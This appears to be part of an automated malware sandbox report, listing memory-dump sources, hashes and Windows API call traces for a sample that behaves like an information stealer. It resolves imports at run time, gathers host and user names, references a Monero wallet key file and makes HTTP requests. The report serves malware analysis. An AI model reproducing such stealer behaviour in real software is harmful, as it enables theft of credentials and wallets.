                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F645DD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F6466D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64729
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64765
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F6473F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F6471E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F646AC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F645C7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F646B7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64713
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64657
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F646CD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F6477B
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00F64622
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: bbbc160406c45016309933f2df12156990cdda9713d444969e7672ae8e61db54
                                  • Instruction ID: 01cead371d9689336bcc8932409f78da830628aa4b42876547fd4ce82005d168
                                  • Opcode Fuzzy Hash: bbbc160406c45016309933f2df12156990cdda9713d444969e7672ae8e61db54
                                  • Instruction Fuzzy Hash: 1241D9607C560D6BE6E4B7E8D84EDDE7A96FFC6F04F605044AC249B2D0C660A980D73B

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 801 f64880-f64942 call f7a7a0 call f647b0 call f7a740 * 5 InternetOpenA StrCmpCA 816 f64944 801->816 817 f6494b-f6494f 801->817 816->817 818 f64955-f64acd call f78b60 call f7a920 call f7a8a0 call f7a800 * 2 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a920 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a920 call f7a8a0 call f7a800 * 2 InternetConnectA 817->818 819 f64ecb-f64ef3 InternetCloseHandle call f7aad0 call f69ac0 817->819 818->819 905 f64ad3-f64ad7 818->905 829 f64ef5-f64f2d call f7a820 call f7a9b0 call f7a8a0 call f7a800 819->829 830 f64f32-f64fa2 call f78990 * 2 call f7a7a0 call f7a800 * 8 819->830 829->830 906 f64ae5 905->906 907 f64ad9-f64ae3 905->907 908 f64aef-f64b22 HttpOpenRequestA 906->908 907->908 909 f64ebe-f64ec5 InternetCloseHandle 908->909 910 f64b28-f64e28 call f7a9b0 call f7a8a0 call f7a800 call f7a920 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a920 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a920 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a9b0 call f7a8a0 call f7a800 call f7a920 call f7a8a0 call f7a800 call f7a740 call f7a920 * 2 call f7a8a0 call f7a800 * 2 call f7aad0 lstrlen call f7aad0 * 2 lstrlen call f7aad0 HttpSendRequestA 908->910 909->819 1021 f64e32-f64e5c InternetReadFile 910->1021 1022 f64e67-f64eb9 InternetCloseHandle call f7a800 1021->1022 1023 f64e5e-f64e65 1021->1023 1022->909 1023->1022 1024 f64e69-f64ea7 call f7a9b0 call f7a8a0 call f7a800 1023->1024 1024->1021
                                  APIs
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F64839
                                    • Part of subcall function 00F647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F64849
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F64915
                                  • StrCmpCA.SHLWAPI(?,016FE4D0), ref: 00F6493A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F64ABA
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00F80DDB,00000000,?,?,00000000,?,",00000000,?,016FE590), ref: 00F64DE8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00F64E04
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F64E18
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F64E49
                                  • InternetCloseHandle.WININET(00000000), ref: 00F64EAD
                                  • InternetCloseHandle.WININET(00000000), ref: 00F64EC5
                                  • HttpOpenRequestA.WININET(00000000,016FE490,?,016FDA18,00000000,00000000,00400100,00000000), ref: 00F64B15
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00F64ECF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                   • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: 43a925830a0296d2b4060deac2297e914a6292dc97f0656ad04689d4a97d923f
                                  • Instruction ID: 6361fd0d0d29ff5174901f574c589b9dd9e0cea49cd3012ae4af8f9001957184
                                  • Opcode Fuzzy Hash: 43a925830a0296d2b4060deac2297e914a6292dc97f0656ad04689d4a97d923f
                                  • Instruction Fuzzy Hash: 2E120F71910118AADB15EBA0DC92FEEB738BF54300F5181AAB11A63091EF746F49DF63
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F77910
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F77917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00F7792F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: a5bce1f879088ffb157d8928cd9427a378feb7b4c0ff2e3ca49a61578de8e6d8
                                  • Instruction ID: 25b8ccd6d55f45ec8eff2c4dfdc992d026626f5e5d55ccc1b2a4a33c61bbd56e
                                  • Opcode Fuzzy Hash: a5bce1f879088ffb157d8928cd9427a378feb7b4c0ff2e3ca49a61578de8e6d8
                                  • Instruction Fuzzy Hash: BC0186B1904305EBC714DF99D945BABBBB8FB44B21F50422AF655E3280C7745944CBA2
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F611B7), ref: 00F77880
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F77887
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F7789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 51e2d68abd6138b9517f868c75a39b2a5b41fd086c3d787a4e080fff98174221
                                  • Instruction ID: 56def49445f3685fe6f65b08d6994ae863e0f55f2ccfa0a5d7dadc3a06ccaa97
                                  • Opcode Fuzzy Hash: 51e2d68abd6138b9517f868c75a39b2a5b41fd086c3d787a4e080fff98174221
                                  • Instruction Fuzzy Hash: 0EF04FB1944209ABC714DF98D949FAEBFB8FB04B11F10026AFA15A3680C7795944CBA2
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 40e9377b927b07c8f55c5bc493706a072c2bac325ecde980279db8499a449d38
                                  • Instruction ID: b2f732018abbf0f4aad78037c748e9929f96d76258693faf5f1c43d774dfc1b6
                                  • Opcode Fuzzy Hash: 40e9377b927b07c8f55c5bc493706a072c2bac325ecde980279db8499a449d38
                                  • Instruction Fuzzy Hash: 2DD017749002089BCB149AE0A8496AEBF7CFB08211F400564D90662240EA315881CBA5

                                   Control-flow Graph

                                   (control-flow graph figure for the function at F79C10: LoadLibraryA * 8 and GetProcAddress * 104, resolving imports at runtime; block and edge serialization omitted)
                                  APIs
                                  • GetProcAddress.KERNEL32(75550000,016E6380), ref: 00F79C2D
                                  • GetProcAddress.KERNEL32(75550000,016E6400), ref: 00F79C45
                                  • GetProcAddress.KERNEL32(75550000,016F8F10), ref: 00F79C5E
                                  • GetProcAddress.KERNEL32(75550000,016F8FB8), ref: 00F79C76
                                  • GetProcAddress.KERNEL32(75550000,016FC990), ref: 00F79C8E
                                  • GetProcAddress.KERNEL32(75550000,016FC9F0), ref: 00F79CA7
                                  • GetProcAddress.KERNEL32(75550000,016EB400), ref: 00F79CBF
                                  • GetProcAddress.KERNEL32(75550000,016FC9A8), ref: 00F79CD7
                                  • GetProcAddress.KERNEL32(75550000,016FC810), ref: 00F79CF0
                                  • GetProcAddress.KERNEL32(75550000,016FC9C0), ref: 00F79D08
                                  • GetProcAddress.KERNEL32(75550000,016FCA08), ref: 00F79D20
                                  • GetProcAddress.KERNEL32(75550000,016E6560), ref: 00F79D39
                                  • GetProcAddress.KERNEL32(75550000,016E6300), ref: 00F79D51
                                  • GetProcAddress.KERNEL32(75550000,016E65C0), ref: 00F79D69
                                  • GetProcAddress.KERNEL32(75550000,016E6420), ref: 00F79D82
                                  • GetProcAddress.KERNEL32(75550000,016FC918), ref: 00F79D9A
                                  • GetProcAddress.KERNEL32(75550000,016FCA68), ref: 00F79DB2
                                  • GetProcAddress.KERNEL32(75550000,016EB590), ref: 00F79DCB
                                  • GetProcAddress.KERNEL32(75550000,016E6440), ref: 00F79DE3
                                  • GetProcAddress.KERNEL32(75550000,016FC900), ref: 00F79DFB
                                  • GetProcAddress.KERNEL32(75550000,016FC840), ref: 00F79E14
                                  • GetProcAddress.KERNEL32(75550000,016FC8E8), ref: 00F79E2C
                                  • GetProcAddress.KERNEL32(75550000,016FCAC8), ref: 00F79E44
                                  • GetProcAddress.KERNEL32(75550000,016E62C0), ref: 00F79E5D
                                  • GetProcAddress.KERNEL32(75550000,016FCAF8), ref: 00F79E75
                                  • GetProcAddress.KERNEL32(75550000,016FC870), ref: 00F79E8D
                                  • GetProcAddress.KERNEL32(75550000,016FC930), ref: 00F79EA6
                                  • GetProcAddress.KERNEL32(75550000,016FCA20), ref: 00F79EBE
                                  • GetProcAddress.KERNEL32(75550000,016FCA38), ref: 00F79ED6
                                  • GetProcAddress.KERNEL32(75550000,016FCAE0), ref: 00F79EEF
                                  • GetProcAddress.KERNEL32(75550000,016FC960), ref: 00F79F07
                                  • GetProcAddress.KERNEL32(75550000,016FC858), ref: 00F79F1F
                                  • GetProcAddress.KERNEL32(75550000,016FCA50), ref: 00F79F38
                                  • GetProcAddress.KERNEL32(75550000,016F99C8), ref: 00F79F50
                                  • GetProcAddress.KERNEL32(75550000,016FC8A0), ref: 00F79F68
                                  • GetProcAddress.KERNEL32(75550000,016FC978), ref: 00F79F81
                                  • GetProcAddress.KERNEL32(75550000,016E62E0), ref: 00F79F99
                                  • GetProcAddress.KERNEL32(75550000,016FC8D0), ref: 00F79FB1
                                  • GetProcAddress.KERNEL32(75550000,016E6320), ref: 00F79FCA
                                  • GetProcAddress.KERNEL32(75550000,016FC948), ref: 00F79FE2
                                  • GetProcAddress.KERNEL32(75550000,016FC9D8), ref: 00F79FFA
                                  • GetProcAddress.KERNEL32(75550000,016E6340), ref: 00F7A013
                                  • GetProcAddress.KERNEL32(75550000,016E63C0), ref: 00F7A02B
                                  • LoadLibraryA.KERNEL32(016FCA80,?,00F75CA3,00F80AEB,?,?,?,?,?,?,?,?,?,?,00F80AEA,00F80AE3), ref: 00F7A03D
                                  • LoadLibraryA.KERNEL32(016FCA98,?,00F75CA3,00F80AEB,?,?,?,?,?,?,?,?,?,?,00F80AEA,00F80AE3), ref: 00F7A04E
                                  • LoadLibraryA.KERNEL32(016FCAB0,?,00F75CA3,00F80AEB,?,?,?,?,?,?,?,?,?,?,00F80AEA,00F80AE3), ref: 00F7A060
                                  • LoadLibraryA.KERNEL32(016FC828,?,00F75CA3,00F80AEB,?,?,?,?,?,?,?,?,?,?,00F80AEA,00F80AE3), ref: 00F7A072
                                  • LoadLibraryA.KERNEL32(016FC8B8,?,00F75CA3,00F80AEB,?,?,?,?,?,?,?,?,?,?,00F80AEA,00F80AE3), ref: 00F7A083
                                  • LoadLibraryA.KERNEL32(016FC888,?,00F75CA3,00F80AEB,?,?,?,?,?,?,?,?,?,?,00F80AEA,00F80AE3), ref: 00F7A095
                                  • LoadLibraryA.KERNEL32(016FCB70,?,00F75CA3,00F80AEB,?,?,?,?,?,?,?,?,?,?,00F80AEA,00F80AE3), ref: 00F7A0A7
                                  • LoadLibraryA.KERNEL32(016FCB58,?,00F75CA3,00F80AEB,?,?,?,?,?,?,?,?,?,?,00F80AEA,00F80AE3), ref: 00F7A0B8
                                  • GetProcAddress.KERNEL32(75750000,016E6960), ref: 00F7A0DA
                                  • GetProcAddress.KERNEL32(75750000,016FCC18), ref: 00F7A0F2
                                  • GetProcAddress.KERNEL32(75750000,016F88C0), ref: 00F7A10A
                                  • GetProcAddress.KERNEL32(75750000,016FCCA8), ref: 00F7A123
                                  • GetProcAddress.KERNEL32(75750000,016E6900), ref: 00F7A13B
                                  • GetProcAddress.KERNEL32(73CC0000,016EB1F8), ref: 00F7A160
                                  • GetProcAddress.KERNEL32(73CC0000,016E69E0), ref: 00F7A179
                                  • GetProcAddress.KERNEL32(73CC0000,016EB108), ref: 00F7A191
                                  • GetProcAddress.KERNEL32(73CC0000,016FCC48), ref: 00F7A1A9
                                  • GetProcAddress.KERNEL32(73CC0000,016FCD08), ref: 00F7A1C2
                                  • GetProcAddress.KERNEL32(73CC0000,016E6840), ref: 00F7A1DA
                                  • GetProcAddress.KERNEL32(73CC0000,016E6A00), ref: 00F7A1F2
                                  • GetProcAddress.KERNEL32(73CC0000,016FCC90), ref: 00F7A20B
                                  • GetProcAddress.KERNEL32(757E0000,016E6740), ref: 00F7A22C
                                  • GetProcAddress.KERNEL32(757E0000,016E68A0), ref: 00F7A244
                                  • GetProcAddress.KERNEL32(757E0000,016FCCC0), ref: 00F7A25D
                                  • GetProcAddress.KERNEL32(757E0000,016FCC30), ref: 00F7A275
                                  • GetProcAddress.KERNEL32(757E0000,016E68E0), ref: 00F7A28D
                                  • GetProcAddress.KERNEL32(758D0000,016EAFA0), ref: 00F7A2B3
                                  • GetProcAddress.KERNEL32(758D0000,016EB1D0), ref: 00F7A2CB
                                  • GetProcAddress.KERNEL32(758D0000,016FCCD8), ref: 00F7A2E3
                                  • GetProcAddress.KERNEL32(758D0000,016E6820), ref: 00F7A2FC
                                  • GetProcAddress.KERNEL32(758D0000,016E6920), ref: 00F7A314
                                  • GetProcAddress.KERNEL32(758D0000,016EB338), ref: 00F7A32C
                                  • GetProcAddress.KERNEL32(76BE0000,016FCBB8), ref: 00F7A352
                                  • GetProcAddress.KERNEL32(76BE0000,016E68C0), ref: 00F7A36A
                                  • GetProcAddress.KERNEL32(76BE0000,016F89C0), ref: 00F7A382
                                  • GetProcAddress.KERNEL32(76BE0000,016FCD20), ref: 00F7A39B
                                  • GetProcAddress.KERNEL32(76BE0000,016FCD38), ref: 00F7A3B3
                                  • GetProcAddress.KERNEL32(76BE0000,016E67A0), ref: 00F7A3CB
                                  • GetProcAddress.KERNEL32(76BE0000,016E67C0), ref: 00F7A3E4
                                  • GetProcAddress.KERNEL32(76BE0000,016FCBD0), ref: 00F7A3FC
                                  • GetProcAddress.KERNEL32(76BE0000,016FCB88), ref: 00F7A414
                                  • GetProcAddress.KERNEL32(75670000,016E6A20), ref: 00F7A436
                                  • GetProcAddress.KERNEL32(75670000,016FCDF8), ref: 00F7A44E
                                  • GetProcAddress.KERNEL32(75670000,016FCBE8), ref: 00F7A466
                                  • GetProcAddress.KERNEL32(75670000,016FCDB0), ref: 00F7A47F
                                  • GetProcAddress.KERNEL32(75670000,016FCD98), ref: 00F7A497
                                  • GetProcAddress.KERNEL32(759D0000,016E6860), ref: 00F7A4B8
                                  • GetProcAddress.KERNEL32(759D0000,016E69A0), ref: 00F7A4D1
                                  • GetProcAddress.KERNEL32(76D80000,016E6940), ref: 00F7A4F2
                                  • GetProcAddress.KERNEL32(76D80000,016FCCF0), ref: 00F7A50A
                                  • GetProcAddress.KERNEL32(6F5C0000,016E66E0), ref: 00F7A530
                                  • GetProcAddress.KERNEL32(6F5C0000,016E6980), ref: 00F7A548
                                  • GetProcAddress.KERNEL32(6F5C0000,016E6700), ref: 00F7A560
                                  • GetProcAddress.KERNEL32(6F5C0000,016FCB40), ref: 00F7A579
                                  • GetProcAddress.KERNEL32(6F5C0000,016E6680), ref: 00F7A591
                                  • GetProcAddress.KERNEL32(6F5C0000,016E69C0), ref: 00F7A5A9
                                  • GetProcAddress.KERNEL32(6F5C0000,016E66A0), ref: 00F7A5C2
                                  • GetProcAddress.KERNEL32(6F5C0000,016E66C0), ref: 00F7A5DA
                                  • GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 00F7A5F1
                                  • GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 00F7A607
                                  • GetProcAddress.KERNEL32(75480000,016FCC78), ref: 00F7A629
                                  • GetProcAddress.KERNEL32(75480000,016F88D0), ref: 00F7A641
                                  • GetProcAddress.KERNEL32(75480000,016FCD50), ref: 00F7A659
                                  • GetProcAddress.KERNEL32(75480000,016FCD68), ref: 00F7A672
                                  • GetProcAddress.KERNEL32(753B0000,016E6780), ref: 00F7A693
                                  • GetProcAddress.KERNEL32(73970000,016FCD80), ref: 00F7A6B4
                                  • GetProcAddress.KERNEL32(73970000,016E6720), ref: 00F7A6CD
                                  • GetProcAddress.KERNEL32(73970000,016FCC00), ref: 00F7A6E5
                                  • GetProcAddress.KERNEL32(73970000,016FCBA0), ref: 00F7A6FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: 3114907ee94f95ae4f347628d3c5299a2d235cb7d3b9155c5519bdd098db0730
                                  • Instruction ID: a360dc137e586e77fcacaca1f29f557c91b75789c6ba74792ba8e2e37205fd1a
                                  • Opcode Fuzzy Hash: 3114907ee94f95ae4f347628d3c5299a2d235cb7d3b9155c5519bdd098db0730
                                  • Instruction Fuzzy Hash: C2620DB5500610AFC37DDFA8F5989663FF9FF8C601794853AA62AC324CD63AA4C1DB50

                                   Control-flow Graph

                                   (control-flow graph figure for the function at F66280: InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, InternetCloseHandle; block and edge serialization omitted)
                                  APIs
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F64839
                                    • Part of subcall function 00F647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F64849
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  • InternetOpenA.WININET(00F80DFE,00000001,00000000,00000000,00000000), ref: 00F662E1
                                  • StrCmpCA.SHLWAPI(?,016FE4D0), ref: 00F66303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F66335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,016FDA18,00000000,00000000,00400100,00000000), ref: 00F66385
